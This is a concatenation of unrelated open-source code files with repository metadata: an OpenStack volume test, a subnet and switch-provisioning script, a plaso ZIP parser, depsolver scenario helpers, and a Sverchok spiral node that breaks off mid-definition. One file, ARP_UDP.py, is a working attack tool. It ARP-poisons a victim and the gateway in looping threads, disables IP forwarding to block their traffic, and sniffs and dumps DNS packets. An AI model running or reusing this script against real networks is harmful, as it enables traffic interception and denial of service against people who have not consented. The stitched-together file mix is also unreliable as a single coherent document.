self.assertIn(transfer.auth_key, res.content.decode('utf-8'))
mock_transfer.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'volume_get'],
})
def test_create_backup_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create backup action is present if and only if
# the volume is available or in-use
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('backups' in actions,
vol.status in ('available', 'in-use'))
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
| apache-2.0 | 5,897,069,910,118,493,000 | 44.455019 | 79 | 0.577588 | false |
efimlosev/corpcolo | noc-ps/add_server.py | 1 | 2912 | from json_p_n import sendRecieve
import pexpect, argparse
from sys import path
import subprocess
path.append('/home/efim/Dropbox')
from ipcalc_flask import calculateSubnet as calc
def Main():
parser = argparse.ArgumentParser()
	parser.add_argument('subnet', help='Give me a subnet', type=str) # positional argument
parser.add_argument('vlan', help='We need a vlan here', type=str) #the same
parser.add_argument('desc', help='We need a description here', type=str) #the same
parser.add_argument('hostname', nargs='?', help='We need a hostname here', type=str) #the same
parser.add_argument('-i', help='We need an Ip here', type=str) #the same
args = parser.parse_args()
temp = addUrl(args.subnet,args.vlan,args.desc)
	temp1 = getAllInformationWeWantToUpdate(temp, {'hostname': args.hostname}, args.i)
updateHost(temp1,args.vlan,args.desc)
def addUrl(subnet,vlan,desc):
tmp = calc(subnet)
sub = str(tmp[0])
gw = str(tmp[1])
ip = str(tmp[2]).split(' - ')[0]
nm = str(tmp[3])
servername, descrend = desc.split(' ')
tmp = None
tmp = sendRecieve('addSubnet',{'subnet': sub, 'gateway': gw, 'netmask': nm, 'vlan' : vlan, 'description': desc})
print tmp['result']['success']
ipSub = { 'ip':ip, 'subnet': sub, 'descrend' : descrend, 'servername' : servername }
return ipSub
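# Illustrative sketch of what addUrl() produces, assuming calculateSubnet() returns a
# (network, gateway, "first - last" range, netmask) tuple for e.g. "10.0.0.0/29":
#   addUrl("10.0.0.0/29", "120", "web01 rack4")
#   -> {'ip': '10.0.0.2', 'subnet': '10.0.0.0/29', 'servername': 'web01', 'descrend': 'rack4'}
# i.e. the subnet is registered over the JSON-RPC API and the first usable address plus
# the split description are handed to the host-update step. The concrete values shown
# here are hypothetical.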
def getAllInformationWeWantToUpdate(ipsub, hostname, ip=None):
ipsub.update(hostname)
if ip != None:
ipsub['ip'] = ip
# print ipsub
return ipsub
def updateHost(whatWeWantToUpdate,vlan,desc ):
hosts = sendRecieve("searchHosts", {'start': 0, 'limit': 100, 'query': whatWeWantToUpdate['servername'] })['result']['data']
exactHost = [ host for host in hosts if host['descr'].split('(')[0] == whatWeWantToUpdate['servername']]
#print exactHost[0]['descr']
for k,v in exactHost[0].iteritems():
if k in whatWeWantToUpdate:
exactHost[0][k] = whatWeWantToUpdate[k]
exactHost[0]['descr'] = str(exactHost[0]['descr'].split(')')[0] + ')' + whatWeWantToUpdate['descrend'])
print exactHost[0]['pool']
connection = sendRecieve("getConnectionsByHost", exactHost[0]['mac'])['result']['data']
switchName = connection[0]['devname']
switchPort = connection[0]['portdescr'].split(' ')[1].split('[')[1].split(']')[0]
devices = sendRecieve("getDevices", 0, 1000)['result']['data']
switchIp = [device['ip'] for device in devices if device['name'] == switchName ][0]
if exactHost[0]['pool'] != 16:
		print 'Something went wrong, exiting!'
exit()
print sendRecieve("getConnectionsByHost", exactHost[0]['mac'])
print exactHost[0]['ip']
print sendRecieve("updateHost", exactHost[0])
subprocess.check_call(['/home/efim/Dropbox/sshs_rem.sh', switchIp, switchPort, vlan, desc])
if __name__ == '__main__':
Main()
#updateHost('710A6R22', {'descr': 'test'})
| gpl-2.0 | -1,418,926,991,163,073,500 | 40.6 | 127 | 0.650755 | false |
Dylan-halls/Network-Exploitation-Toolkit | PacketBlocker/ARP_UDP.py | 1 | 2931 | import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
str(GW)
str(VIP)
str(IFACE)
def pkthandler(pkt):
try:
ip = pkt[IP]
except IndexError:
pass
try:
src = ip.src
dst = ip.dst
except UnboundLocalError:
pass
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
if rawLoad == None: pass
else:
print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
		except KeyboardInterrupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
		except KeyboardInterrupt:
sys.exit(1)
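# v_poison()/gw_poison() are the two halves of a classic ARP cache poisoning attack:
# the victim is repeatedly told that the gateway's IP lives at this host's MAC and the
# gateway is told the same about the victim, so both directions of traffic are steered
# here (and, with ip_forward set to 0 above, effectively blocked while the DNS sniffer
# below inspects it). A single-shot equivalent using explicit "is-at" replies would be
# (illustrative sketch only):
#   send(ARP(op=2, pdst=VIP, psrc=GW))   # poison the victim's ARP cache
#   send(ARP(op=2, pdst=GW, psrc=VIP))   # poison the gateway's ARP cache
# The functions above rely on the default who-has request, which most stacks also cache.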
def format_multi_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
UDP() | mit | -8,585,580,230,848,259,000 | 26.92381 | 118 | 0.493347 | false |
rgayon/plaso | plaso/parsers/czip.py | 1 | 2615 | # -*- coding: utf-8 -*-
"""This file contains a parser for compound ZIP files."""
from __future__ import unicode_literals
import struct
import zipfile
from plaso.lib import errors
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
class CompoundZIPParser(interface.FileObjectParser):
"""Shared functionality for parsing compound zip files.
Compound zip files are zip files used as containers to create another file
format, as opposed to archives of unrelated files.
"""
NAME = 'czip'
DATA_FORMAT = 'Compound ZIP file'
_plugin_classes = {}
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a compound ZIP file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
display_name = parser_mediator.GetDisplayName()
if not zipfile.is_zipfile(file_object):
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2:s}'.format(
self.NAME, display_name, 'Not a Zip file.'))
try:
zip_file = zipfile.ZipFile(file_object, 'r', allowZip64=True)
self._ProcessZipFileWithPlugins(parser_mediator, zip_file)
zip_file.close()
# Some non-ZIP files return true for is_zipfile but will fail with a
# negative seek (IOError) or another error.
except (zipfile.BadZipfile, struct.error) as exception:
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2!s}'.format(
self.NAME, display_name, exception))
def _ProcessZipFileWithPlugins(self, parser_mediator, zip_file):
"""Processes a zip file using all compound zip files.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
zip_file (zipfile.ZipFile): the zip file. It should not be closed in
this method, but will be closed in ParseFileObject().
"""
archive_members = zip_file.namelist()
for plugin in self._plugins:
try:
plugin.UpdateChainAndProcess(
parser_mediator, zip_file=zip_file, archive_members=archive_members)
except errors.WrongCompoundZIPPlugin as exception:
logger.debug('[{0:s}] wrong plugin: {1!s}'.format(
self.NAME, exception))
manager.ParsersManager.RegisterParser(CompoundZIPParser)
| apache-2.0 | 3,504,794,705,852,098,000 | 33.407895 | 80 | 0.690631 | false |
enthought/depsolver | depsolver/solver/tests/scenarios/common.py | 1 | 6526 | import collections
import glob
import json
import subprocess
import tempfile
import os.path as op
import yaml
from depsolver.bundled.traitlets \
import \
HasTraits, Dict, Instance, List, Long, Unicode
from depsolver.constraints \
import \
Any, GEQ, LT
from depsolver.package \
import \
PackageInfo
from depsolver.pool \
import \
Pool
from depsolver.repository \
import \
Repository
from depsolver.request \
import \
Request
from depsolver.requirement \
import \
Requirement
from depsolver.requirement_parser \
import \
RawRequirementParser
COMMON_IMPORTS = """\
use Composer\DependencyResolver\Decisions;
use Composer\DependencyResolver\DefaultPolicy;
use Composer\DependencyResolver\Pool;
use Composer\DependencyResolver\Request;
use Composer\DependencyResolver\RuleWatchGraph;
use Composer\DependencyResolver\RuleWatchNode;
use Composer\DependencyResolver\Solver;
use Composer\DependencyResolver\Transaction;
use Composer\Json\JsonFile;
use Composer\Package\CompletePackage;
use Composer\Package\Link;
use Composer\Package\LinkConstraint\MultiConstraint;
use Composer\Package\LinkConstraint\VersionConstraint;
use Composer\Package\Loader\ArrayLoader;
use Composer\Repository\ArrayRepository;
use Composer\Repository\FilesystemRepository;
use Composer\Repository\InstalledFilesystemRepository;
use Composer\Repository\WritableArrayRepository;
"""
COMPOSER_PATH = "/Users/cournape/src/dev/composer/composer-git"
#COMPOSER_PATH = "/home/davidc/src/projects/composer-git"
P = PackageInfo.from_string
R = Requirement.from_string
def requirement_to_php_string(req):
s = str(req)
parts = (part.split() for part in s.split(","))
ret = []
for part in parts:
ret.append(" ".join(part[1:]))
return ", ".join(ret)
def requirements_to_php_dict(requirements):
php_dict = collections.defaultdict(list)
for requirement in requirements:
php_dict[requirement.name].append(requirement_to_php_string(requirement))
return dict((k, ", ".join(v)) for k, v in php_dict.items())
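# Illustrative example of the two helpers above (package names are hypothetical): a
# requirement whose string form is "numpy >= 1.3.0, numpy < 2.0.0" is reduced to
# ">= 1.3.0, < 2.0.0" by requirement_to_php_string(), and requirements_to_php_dict()
# groups such strings per package, e.g. {"numpy": ">= 1.3.0, < 2.0.0"}, matching
# Composer's require/conflict/replace dictionary layout.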
def packages_list_to_php_json(packages):
res = []
for package in packages:
version_normalized = str(package.version) + ".0"
res.append({
"name": package.name,
"version": str(package.version),
"version_normalized": version_normalized,
"provide": requirements_to_php_dict(package.provides),
"require": requirements_to_php_dict(package.dependencies),
"conflict": requirements_to_php_dict(package.conflicts),
"replace": requirements_to_php_dict(package.replaces),
})
return json.dumps(res, indent=4)
def requirement_string_to_php_constraints(req):
ret = []
parser = RawRequirementParser()
reqs = parser.parse(req).items()
if not len(reqs) == 1:
raise ValueError()
for name, constraints in reqs:
for constraint in constraints:
if isinstance(constraint, GEQ):
ret.append((">=", constraint.version))
elif isinstance(constraint, LT):
ret.append(("<", constraint.version))
elif isinstance(constraint, Any):
pass
else:
raise ValueError("Unsupported constraint: %s" % constraint)
return ret
def job_to_php_constraints(job):
"""
Extract requirements from a _Job instance into a comma-separated string of
php requirements.
"""
s = str(job.requirement)
constraints = ['new VersionConstraint("%s", "%s")' % \
(ret[0], ret[1]) \
for ret in requirement_string_to_php_constraints(s)]
return ',\n'.join(constraints)
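# For a job requirement such as "numpy >= 1.3.0, numpy < 2.0.0" the expected output of
# job_to_php_constraints() is the PHP fragment (assuming str() of the requirement keeps
# that form):
#   new VersionConstraint(">=", "1.3.0"),
#   new VersionConstraint("<", "2.0.0")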
class BaseScenario(HasTraits):
remote_repository = Instance(Repository)
installed_repository = Instance(Repository)
pool = Instance(Pool)
request = Instance(Request)
@classmethod
def from_yaml(cls, filename):
with open(filename, "rt") as fp:
raw_data = yaml.load(fp)
packages = [P(s) for s in raw_data.get("packages", [])]
package_name_to_package = {}
for package in packages:
package_name_to_package[package.unique_name] = package
raw_installed_packages = raw_data.get("installed_repository", []) or []
installed_packages = [package_name_to_package[package_name] \
for package_name in raw_installed_packages]
raw_remote_packages = raw_data.get("remote_repository", []) or []
remote_packages = [package_name_to_package[package_name] \
for package_name in raw_remote_packages]
request_data = [(r["operation"], r["requirement"]) \
for r in raw_data.get("request", []) or []]
return cls.from_data(remote_packages=remote_packages,
installed_packages=installed_packages,
request_jobs=request_data)
@classmethod
def from_data(cls, remote_packages, installed_packages, request_jobs):
remote_repository = Repository(packages=[P(p.package_string) for p in remote_packages])
installed_repository = Repository(packages=[P(p.package_string) for p in installed_packages])
pool = Pool([remote_repository, installed_repository])
request = Request(pool)
for name, requirement_string in request_jobs:
getattr(request, name)(R(requirement_string))
return cls(remote_repository=remote_repository,
installed_repository=installed_repository,
pool=pool, request=request)
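# The YAML scenarios consumed by BaseScenario.from_yaml() follow the keys read above;
# a minimal sketch (package-string syntax assumed, values hypothetical):
#
#   packages:
#     - "mkl 10.3.0"
#     - "numpy 1.7.0; depends (mkl >= 10.3.0)"
#   remote_repository:
#     - mkl-10.3.0
#     - numpy-1.7.0
#   installed_repository:
#   request:
#     - operation: install
#       requirement: numpy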
def run_php_scenarios(data_directory, scenario_class, post_process, test_directory=None):
if test_directory is None:
test_directory = data_directory
for path in glob.glob(op.join(data_directory, "*.yaml")):
php_file = op.splitext(path)[0] + ".php"
print(path)
print(php_file)
test_file = op.splitext(op.join(test_directory, op.basename(path)))[0] + ".test"
scenario = scenario_class.from_yaml(path)
scenario.to_php(php_file, composer_location=COMPOSER_PATH)
with tempfile.NamedTemporaryFile(suffix=".php") as fp:
scenario.to_php(fp.name, composer_location=COMPOSER_PATH)
with open(test_file, "wt") as ofp:
output = subprocess.check_output(["php", fp.name])
ofp.write(post_process(output))
| bsd-3-clause | -6,149,799,869,014,685,000 | 33.167539 | 101 | 0.650781 | false |
DolphinDream/sverchok | nodes/generators_extended/spiral_mk2.py | 1 | 22191 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import IntProperty, FloatProperty, BoolProperty, EnumProperty
from math import sin, cos, pi, sqrt, exp, atan, log
import re
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, match_long_repeat, get_edge_list
from sverchok.utils.sv_easing_functions import *
from sverchok.utils.sv_transform_helper import AngleUnits, SvAngleHelper
PHI = (sqrt(5) + 1) / 2 # the golden ratio
PHIPI = 2 * log(PHI) / pi # exponent for the Fibonacci (golden) spiral
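# PHIPI is roughly 0.3063; a logarithmic spiral with this exponent grows by a factor of
# PHI every quarter turn (exp(PHIPI * pi/2) == PHI), which is what makes the FIBONACCI
# preset below a golden spiral.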
spiral_type_items = [
("ARCHIMEDEAN", "Archimedean", "Generate an archimedean spiral.", 0),
("LOGARITHMIC", "Logarithmic", "Generate a logarithmic spiral.", 1),
("SPHERICAL", "Spherical", "Generate a spherical spiral.", 2),
("OVOIDAL", "Ovoidal", "Generate an ovoidal spiral.", 3),
("CORNU", "Cornu", "Generate a cornu spiral.", 4),
("EXO", "Exo", "Generate an exo spiral.", 5),
("SPIRANGLE", "Spirangle", "Generate a spirangle spiral.", 6)
]
# name : [ preset index, type, eR, iR, exponent, turns, resolution, scale, height ]
spiral_presets = {
" ": (0, "", 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0),
# archimedean spirals
"ARCHIMEDEAN": (10, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 0.0),
"PARABOLIC": (11, "ARCHIMEDEAN", 1.0, 0.0, 2.0, 5, 100, 1.0, 0.0),
"HYPERBOLIC": (12, "ARCHIMEDEAN", 1.0, 0.0, -1.0, 11, 100, 1.0, 0.0),
"LITUUS": (13, "ARCHIMEDEAN", 1.0, 0.0, -2.0, 11, 100, 1.0, 0.0),
# logarithmic spirals
"FIBONACCI": (20, "LOGARITHMIC", 1.0, 0.5, PHIPI, 3, 100, 1.0, 0.0),
# 3D spirals (mix type)
"CONICAL": (30, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 3.0),
"HELIX": (31, "LOGARITHMIC", 1.0, 0.0, 0.0, 7, 100, 1.0, 4.0),
"SPHERICAL": (32, "SPHERICAL", 1.0, 0.0, 0.0, 11, 55, 1.0, 0.0),
"OVOIDAL": (33, "OVOIDAL", 5.0, 1.0, 0.0, 7, 55, 1.0, 6.0),
    # spiral oddities
"CORNU": (40, "CORNU", 1.0, 1.0, 1.0, 5, 55, 1.0, 0.0),
"EXO": (41, "EXO", 1.0, 0.1, PHI, 11, 101, 1.0, 0.0),
# choppy spirals
"SPIRANGLE SC": (50, "SPIRANGLE", 1.0, 0.0, 0.0, 8, 4, 1.0, 0.0),
"SPIRANGLE HX": (51, "SPIRANGLE", 1.0, 0.0, 0.5, 7, 6, 1.0, 0.)
}
normalize_items = [
("ER", "eR", "Normalize spiral to the external radius.", 0),
("IR", "iR", "Normalize spiral to the internal radius.", 1)
]
def make_archimedean_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth (between iR and eR)
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
epsilon = 1e-5 if exponent < 0 else 0 # to avoid raising zero to negative power
exponent = 1e-2 if exponent == 0 else exponent # to avoid division by zero
dR = eR - iR # radius range : cached for performance
ex = 1 / exponent # inverse exponent : cached for performance
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
r = (iR + dR * (t + epsilon) ** ex) * scale # essentially: r = a * t ^ (1/b)
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
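# With the radius law above (r grows like t ** (1/exponent) between iR and eR), the
# presets map onto the classic named curves: exponent 1 is Archimedes' spiral (r ~ t),
# 2 is the parabolic/Fermat spiral (r ~ sqrt(t)), -1 the hyperbolic spiral (r ~ 1/t)
# and -2 the lituus (r ~ 1/sqrt(t)).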
def make_logarithmic_spiral(settings):
'''
eR : exterior radius
iR : interior radius
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t
r = eR * exp(exponent * phi) * scale # essentially: r = a * e ^ (b*t)
pho = phi * sign + phase # final angle : cached for performance
x = r * sin(pho)
y = r * cos(pho)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
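# Note that exponent == 0 makes exp(exponent * phi) identically 1, so the radius stays
# fixed at eR * scale and the curve degenerates to a circle; combined with a non-zero
# height this is exactly how the HELIX preset produces a plain helix.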
def make_spherical_spiral(settings):
'''
    This is the approximate spherical spiral that has a finite length,
where the phi & theta angles sweep their ranges at constant rates.
eR : exterior radius
iR : interior radius (UNUSED)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z (UNUSED)
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
RxCosTheta = (iR + eR * cos(theta)) * scale # cached for performance
x = cos(phi) * RxCosTheta
y = sin(phi) * RxCosTheta
z = eR * sin(theta)
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_ovoidal_spiral(settings):
'''
eR : exterior radius (vertical cross section circles)
iR : interior radius (horizontal cross section circle)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
# derive eR based on iR and height (the main parameters)
    # eR = [iR + (H/2)^2/iR]/2 ::: H = 2 * sqrt(2*iR*eR - iR*iR)
eR = 0.5 * (iR + 0.25 * height * height / iR)
eR2 = eR * eR # cached for performance
dR = eR - iR # cached for performance
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
h = 0.5 * height * sin(theta) # [-H/2, +H/2]
r = sqrt(eR2 - h * h) - dR # [0 -> iR -> 0]
x = r * cos(phi) * scale
y = r * sin(phi) * scale
z = h * scale
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
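# Quick numeric check of the eR derivation above, using the OVOIDAL preset (iR=1,
# height=6): eR = 0.5 * (1 + 0.25 * 36 / 1) = 5.0, which matches the preset's exterior
# radius; at h = +/-3 the horizontal radius sqrt(eR*eR - h*h) - dR collapses to 0, so
# the ovoid closes at its poles.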
def make_cornu_spiral(settings):
'''
L : length
N : resolution
S : scale
    M : number of integration steps per sample (computed adaptively in the loop below)
x(t) = s * Integral(0,t) { cos(pi*u*u/2) du }
y(t) = s * Integral(0,t) { sin(pi*u*u/2) du }
TODO : refine the math (smoother curve, adaptive res, faster computation)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
N = N * turns # total number of points in the spiral
L = iR * turns # length
S = eR * scale # overall scale
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
    verts1 = [] # positive spiral verts
    verts2 = [] # negative spiral verts
norms = []
add_vert1 = verts1.append
add_vert2 = verts2.append
add_norm = norms.append
l1 = 0
x = 0
y = 0
for n in range(N + 1):
t = n / N # t = [0,1]
a = QuadraticEaseOut(t)
# a = ExponentialEaseOut(t, es)
l = L * a # l = [0, +L]
r = x * x + y * y
# print("r=", r)
# M = 100 + int(300 * pow(r, exponent)) # integral steps
M = 100 + int(100 * a) # integral steps
l2 = l
# integral from l1 to l2
u = l1
du = (l2 - l1) / M
for m in range(M + 1):
u = u + du # u = [l1, l2]
phi = u * u * pi / 2
x = x + cos(phi) * du
y = y + sin(phi) * du
l1 = l2
# scale and flip
xx = x * S
yy = y * S * sign
# rotate by phase amount
px = xx * cos(phase) - yy * sin(phase)
py = xx * sin(phase) + yy * cos(phase)
pz = height * t
add_vert1([px, py, pz]) # positive spiral verts
        add_vert2([-px, -py, -pz]) # negative spiral verts
verts = verts2[::-1] + verts1
edges = get_edge_list(N)
return verts, edges, norms
def make_exo_spiral(settings):
'''
This is an exponential in & out between two circles
eR : exterior radius
iR : interior radius
exponent : rate of growth (SIGMOID : exponential in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = 1 if flip else -1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(11, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
a = ExponentialEaseInOut(t, es) # ease radius variation (SIGMOID)
r = (iR + (eR - iR) * a) * scale
phi = max_phi * t + phase
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spirangle_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
deltaA = 2 * pi / N * sign # angle increment
deltaE = exponent / N # exponent increment
deltaR = (eR + iR) # radius increment
deltaZ = height / (N * turns) # z increment
e = 0
r = iR
phi = phase
x, y, z = [0, 0, -deltaZ]
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
x = x + r * cos(phi) * scale
y = y + r * sin(phi) * scale
z = z + deltaZ
e = e + deltaE
r = r + deltaR * exp(e)
phi = phi + deltaA
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def normalize_spiral(verts, normalize_eR, eR, iR, scale):
'''
Normalize the spiral (XY) to either exterior or interior radius
'''
if normalize_eR: # normalize to exterior radius (ending radius)
psx = verts[-1][0] # x coordinate of the last point in the spiral
psy = verts[-1][1] # y coordinate of the last point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = eR / r * scale if eR != 0 else 1
else: # normalize to interior radius (starting radius)
psx = verts[0][0] # x coordinate of the first point in the spiral
psy = verts[0][1] # y coordinate of the first point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = iR / r * scale if iR != 0 else 1
for n in range(len(verts)):
verts[n][0] *= ss
verts[n][1] *= ss
return verts
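# Example of the intent: an archimedean spiral asked for with eR=2 ends wherever its
# last sample happens to land, so normalize_spiral() rescales every XY coordinate by
# eR / actual_end_radius (or iR / actual_start_radius) to pin the curve exactly onto
# the requested exterior (or interior) circle; Z is left untouched.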
class SvSpiralNodeMK2(bpy.types.Node, SverchCustomTreeNode, SvAngleHelper):
"""
Triggers: Spiral
Tooltip: Generate spiral curves
"""
bl_idname = 'SvSpiralNodeMK2'
bl_label = 'Spiral'
sv_icon = "SV_SPIRAL"
def update_angles(self, context, au):
''' Update all the angles to preserve their values in the new units '''
self.phase = self.phase * au
def update_spiral(self, context):
if self.updating:
return
self.presets = " "
updateNode(self, context)
def preset_items(self, context):
return [(k, k.title(), "", "", s[0]) for k, s in sorted(spiral_presets.items(), key=lambda k: k[1][0])]
def update_presets(self, context):
self.updating = True
if self.presets == " ":
self.updating = False
return
_, sT, eR, iR, e, t, N, s, h = spiral_presets[self.presets]
self.sType = sT
self.eRadius = eR
self.iRadius = iR
self.exponent = e
self.turns = t
self.resolution = N
self.scale = s
self.height = h
self.phase = 0.0
self.arms = 1
self.flip = False
self.separate = False
self.updating = False
updateNode(self, context)
presets: EnumProperty(
name="Presets", items=preset_items,
update=update_presets)
sType: EnumProperty(
name="Type", items=spiral_type_items,
default="ARCHIMEDEAN", update=update_spiral)
normalize: EnumProperty(
name="Normalize Radius", items=normalize_items,
default="ER", update=update_spiral)
iRadius: FloatProperty(
name="Interior Radius", description="Interior radius",
default=1.0, min=0.0, update=update_spiral)
eRadius: FloatProperty(
name="Exterior Radius", description="Exterior radius",
default=2.0, min=0.0, update=update_spiral)
turns: IntProperty(
name="Turns", description="Number of turns",
default=11, min=1, update=update_spiral)
arms: IntProperty(
name="Arms", description="Number of spiral arms",
